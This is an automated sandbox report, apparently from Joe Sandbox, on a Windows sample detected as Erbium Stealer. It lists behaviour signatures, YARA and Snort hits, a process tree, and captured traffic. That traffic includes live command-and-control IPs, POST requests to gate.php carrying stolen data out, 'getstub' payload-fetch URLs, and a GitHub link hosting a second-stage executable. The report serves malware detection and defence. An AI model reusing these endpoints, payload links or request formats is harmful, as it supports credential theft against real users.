Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EgNIXduB6T.exe

Overview

General Information

Sample Name:EgNIXduB6T.exe
Analysis ID:719200
MD5:31d7dfe9c9f72bc7ad828091531e6544
SHA1:c3449ef86baf2064885cec6b066d0f0f27304d0f
SHA256:16de5442d1f76e68a5167e3d8050b30276fdc3db361a420d9420e724feffe138
Tags:ErbiumStealerexe
Infos:

Detection

Erbium Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Erbium Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Writes to foreign memory regions
Connects to many ports of the same IP (likely port scanning)
Tries to harvest and steal ftp login credentials
Contains functionality to register a low level keyboard hook
Allocates memory in foreign processes
Found C&C like URL pattern
Tries to harvest and steal Bitcoin Wallet information
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Contains functionality to inject threads in other processes
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality to upload files via FTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the product ID of Windows
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • EgNIXduB6T.exe (PID: 5796 cmdline: C:\Users\user\Desktop\EgNIXduB6T.exe MD5: 31D7DFE9C9F72BC7AD828091531E6544)
    • wJpTOIbAbrslKXUFtgsTdnp.exe (PID: 5704 cmdline: C:\Program Files (x86)\VzyXoosWayiWtxuQQzUnYrVmOCwvGFaOIttqAjobUgFE\wJpTOIbAbrslKXUFtgsTdnp.exe MD5: 77276DDC82248473D033E2494C438A97)
      • hjrypmyqervekvpteu.exe (PID: 2356 cmdline: "C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe" MD5: 8DD297E546397E6982E7350E4F9F154A)
  • cleanup
{"C2 list": ["http://77.73.133.53/cloud/index.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
  • 0x2b6e8d:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
SourceRuleDescriptionAuthorStrings
00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_ErbiumStealerYara detected Erbium StealerJoe Security
    00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
    • 0x276968:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
    00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_ErbiumStealerYara detected Erbium StealerJoe Security
      00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
      • 0x277568:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
      Process Memory Space: EgNIXduB6T.exe PID: 5796JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        0.2.EgNIXduB6T.exe.1e00000.1.raw.unpackJoeSecurity_ErbiumStealerYara detected Erbium StealerJoe Security
          0.2.EgNIXduB6T.exe.1e00000.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
          • 0x276968:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
          0.2.EgNIXduB6T.exe.1e00000.1.unpackJoeSecurity_ErbiumStealerYara detected Erbium StealerJoe Security
            0.2.EgNIXduB6T.exe.1e00000.1.unpackINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
            • 0x275d68:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
            0.2.EgNIXduB6T.exe.5f00000.2.raw.unpackJoeSecurity_ErbiumStealerYara detected Erbium StealerJoe Security
              Click to see the 3 entries
              No Sigma rule has matched
              Timestamp:192.168.2.3194.190.152.19449695802022986 10/10/22-06:02:03.227726
              SID:2022986
              Source Port:49695
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:194.190.152.194192.168.2.380496942038746 10/10/22-06:01:58.008772
              SID:2038746
              Source Port:80
              Destination Port:49694
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:194.190.152.194192.168.2.380496922009897 10/10/22-06:01:56.609735
              SID:2009897
              Source Port:80
              Destination Port:49692
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3194.190.152.19449692802038723 10/10/22-06:01:56.533441
              SID:2038723
              Source Port:49692
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3194.190.152.19449694802022986 10/10/22-06:01:57.946506
              SID:2022986
              Source Port:49694
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:77.73.133.53192.168.2.380496932038745 10/10/22-06:01:57.884049
              SID:2038745
              Source Port:80
              Destination Port:49693
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3194.190.152.19449695802017930 10/10/22-06:02:03.227726
              SID:2017930
              Source Port:49695
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: EgNIXduB6T.exeReversingLabs: Detection: 61%
              Source: EgNIXduB6T.exeVirustotal: Detection: 68%Perma Link
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\winscr[1].exeReversingLabs: Detection: 45%
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeReversingLabs: Detection: 45%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\winscr[1].exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Erbium Stealer {"C2 list": ["http://77.73.133.53/cloud/index.php"]}
              Source: C:\Users\user\Desktop\EgNIXduB6T.exeCode function: 0_2_0611B950 CryptAcquireContextW,CryptCreateHash,0_2_0611B950
              Source: EgNIXduB6T.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
              Source: EgNIXduB6T.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49698 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49699 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_013070D8 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,2_2_013070D8
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01304A96 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,2_2_01304A96
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01304860 __EH_prolog,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,2_2_01304860
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01318DA6 FindFirstFileExA,2_2_01318DA6

              Networking

              barindex
              Source: TrafficSnort IDS: 2038723 ET TROJAN ErbiumStealer Variant CnC Activity (getstub) 192.168.2.3:49692 -> 194.190.152.194:80
              Source: TrafficSnort IDS: 2009897 ET TROJAN Possible Windows executable sent when remote host claims to send html content 194.190.152.194:80 -> 192.168.2.3:49692
              Source: TrafficSnort IDS: 2038745 ET TROJAN ErbiumStealer Response From Panel 77.73.133.53:80 -> 192.168.2.3:49693
              Source: TrafficSnort IDS: 2022986 ET TROJAN Generic Request to gate.php Dotted-Quad 192.168.2.3:49694 -> 194.190.152.194:80
              Source: TrafficSnort IDS: 2038746 ET TROJAN ErbiumStealer Response From CnC 194.190.152.194:80 -> 192.168.2.3:49694
              Source: TrafficSnort IDS: 2022986 ET TROJAN Generic Request to gate.php Dotted-Quad 192.168.2.3:49695 -> 194.190.152.194:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49695 -> 194.190.152.194:80
              Source: global trafficTCP traffic: 185.106.92.60 ports 64711,64710,64713,64712,64715,64717,64716,64707,64709,64720,64601,64722,64600,64603,64724,64602,64723,64605,64726,64725,64607,64728,64606,64719,1,64718,2,21,64610,64731,64730,64611,64732,64614,64735,64613,64734,64616,64737,64615,64736,64618,64739,64609,64608,64729,64740,64621,64742,64620,64741,64622,64743,64625,64746,64624,64745,64627,64748,64508,64629,64628,64749,64619,64630,64750,64511,64753,64510,64631,64752,64513,64634,64633,64515,64636,64514,64635,64516,64637,64519,64518,64639,64509,64520,64641,64640,64522,64521,64642,64524,64645,64523,64644,64526,64646,64528,64649,64527,64648,64529,64531,64651,64533,64654,64532,64653,64535,64656,64534,64655,64537,64658,64657,64538,64540,64661,64660,64663,64541,64662,64544,64665,64543,64667,64546,64545,64666,64548,64668,64549,64670,64551,64550,64671,64553,64674,64673,64555,64676,64554,64675,64678,64557,64677,64556,64559,64560,64680,64562,64561,64682,64685,64563,64684,64687,64566,64565,64686,64568,64567,64688,64569,64692,64570,64691,64573,64694,64572,64693,64575,64696,64574,64695,64698,64576,64579,64699,64578,64690,64581,64584,64583,64585,64587,64589,64580,64592,64595,64594,64597,64596,64599,64591,64590,64700,64702,64701,64704,64706,64705
              Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Host: 194.190.152.194User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36Accept: */*Content-Length: 83404Content-Type: multipart/form-data; boundary=------------------------f057a9d3d4e5d9b5
              Source: Malware configuration extractorURLs: http://77.73.133.53/cloud/index.php
              Source: Joe Sandbox ViewASN Name: RSHB-ASRU RSHB-ASRU
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
              Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
              Source: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exeCode function: 2_2_01304C77 __EH_prolog,InternetOpenW,InternetConnectW,FtpCreateDirectoryW,FtpCreateDirectoryW,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,2_2_01304C77
              Source: global trafficHTTP traffic detected: GET /lakrica0/TeIegram/raw/main/winscr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /lakrica0/TeIegram/main/winscr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: raw.githubusercontent.com
              Source: global trafficHTTP traffic detected: GET /cloud/getHost.php?method=getstub&bid=1923830098%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36Host: 77.73.133.53
              Source: global trafficHTTP traffic detected: GET /api.php?method=getstub&bid=default%20%20%20%20%20%20%20%20%20&tag=Telegram%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36Host: 194.190.152.194
              Source: global trafficHTTP traffic detected: GET /cloud/index.php HTTP/1.1Host: 77.73.133.53User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 OPR/83.0.4254.27Accept: */*Cookie: PHPSESSID=ZrOP1CNQKIVeL1ZP
              Source: global trafficHTTP traffic detected: GET /gate.php HTTP/1.1Host: 194.190.152.194User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 OPR/83.0.4254.27Accept: */*
              Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Host: 194.190.152.194User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36Accept: */*Content-Length: 83404Content-Type: multipart/form-data; boundary=------------------------f057a9d3d4e5d9b5
              Source: global trafficTCP traffic: 192.168.2.3:49708 -> 185.106.92.60:64508
              Source: unknownFTP traffic detected: 185.106.92.60:21 -> 192.168.2.3:49707 220-FileZilla Server version 0.9.41 beta
              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknownTCP traffic detected without corresponding DNS query: 77.73.133.53
              Source: unknownTCP traffic detected without corresponding DNS query: 77.73.133.53
              Source: unknownTCP traffic detected without corresponding DNS query: 77.73.133.53
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 77.73.133.53
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: unknownTCP traffic detected without corresponding DNS query: 194.190.152.194
              Source: EgNIXduB6T.exe, 00000000.00000003.240446775.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.190.152.194/api.php?method=getstub&bid=default%20%20%20%20%20%20%20%20%20&tag=Telegram%20
              Source: EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.190.152.194/gate.php
              Source: EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.190.152.194/gate.phpd
              Source: EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.190.152.194/gate.phpphp
              Source: EgNIXduB6T.exe, 00000000.00000002.505628300.00000000014CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.73.133.53/cloud/getHost.php?method=getstub&bid=1923830098%20%20%20%20%20%20%20%20%20%20%20
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: hjrypmyqervekvpteu.exe, 00000002.00000002.506259275.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sourceforge.net/projects/filezilla/
              Source: EgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
              Source: EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.11.1-motley.z%02d...././///.//../6666666666666666jjjjjjjjjjjjjjjj
              Source: TempWebDatabase.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: TempWebDatabase.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: EgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
              Source: EgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
              Source: EgNIXduB6T.exe, EgNIXduB6T.exe, 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000002.506717287.0000000001E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
              Source: EgNIXduB6T.exe, 00000000.00000003.241378953.0000000001571000.00000004.00000020.00020000.00000000.sdmp, TempHistory.0.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
              Source: TempWebDatabase.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: EgNIXduB6T.exe, 00000000.00000003.241157208.0000000001575000.00000004.00000020.00020000.00000000.sdmp, TempWebDatabase.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: TempWebDatabase.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276421228.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs.microsoft.c
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276421228.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507908227.0000000001933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/-
              Source: EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276486720.00000000018D3000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.263803529.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.260483650.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.259475130.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.506817006.0000000001840000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507445027.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.261729658.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.257036911.00000000020F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/lakrica0/TeIegram/raw/main/winscr.exe
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.263803529.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.260483650.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.259475130.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.261729658.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000000.257036911.00000000020F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/lakrica0/TeIegram/raw/main/winscr.exeC:
              Source: EgNIXduB6T.exe, 00000000.00000002.506039869.000000000150C000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369149690.0000000001509000.00000004.00000020.00020000.00000000.sdmp, EgNIXduB6T.exe, 00000000.00000003.369400707.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/lakrica0/TeIegram/raw/main/winscr.exefox/97.0&
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276315735.0000000001930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/lakrica0/TeIegram/raw/main/winscr.exegs
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276486720.00000000018D3000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/lakrica0/TeIegram/raw/main/winscr.exez
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276421228.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/qe
              Source: wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000003.276421228.00000000018FE000.00000004.00000020.00020000.00000000.sdmp, wJpTOIbAbrslKXUFtgsTdnp.exe, 00000001.00000002.507540025.00000000018D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
